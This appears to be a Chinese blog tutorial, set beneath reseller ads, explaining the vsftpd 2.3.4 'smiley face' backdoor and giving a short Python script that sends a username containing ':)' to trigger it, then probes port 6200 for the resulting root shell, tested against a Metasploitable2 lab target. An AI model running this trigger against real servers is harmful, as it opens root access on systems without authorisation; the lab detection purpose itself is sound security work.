python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
阿里云国内75折 回扣 微信号:monov8 |
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保
一、漏洞介绍
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接并且VSFTPD v2.3.4 服务是以 root 权限运行的最终我们提到的权限也是root当连接带有vsftpd 2.3.4版本的服务器的21端口时输入用户中带有“:) ”,密码任意因此也称为笑脸漏洞。
二、环境搭建
攻击机本机192.168.1.3
靶机metaspolit2192.168.1.5
三、nmap进行漏洞检测
四python脚本进行漏洞检测
代码如下
import socket
from ftplib import FTP
url = input("请输入你需要检测的地址")
ftp = FTP()
username = 'root:)' #用户名必须包含)这两个字符
password = 'anonymous' #密码随便啥都行
try:
ftp.connect(url,21,timeout=10)#使用ftp登录设置延时10秒
ftp.login(username,password)
ftp.quit()
except:
print("完成登录检测")
try:
s = socket.socket() #使用socket函数来检测是否有漏洞存在
s.connect((url,6200))
s.close()
print("存在微笑漏洞")
except:
print("没有发现笑脸漏洞")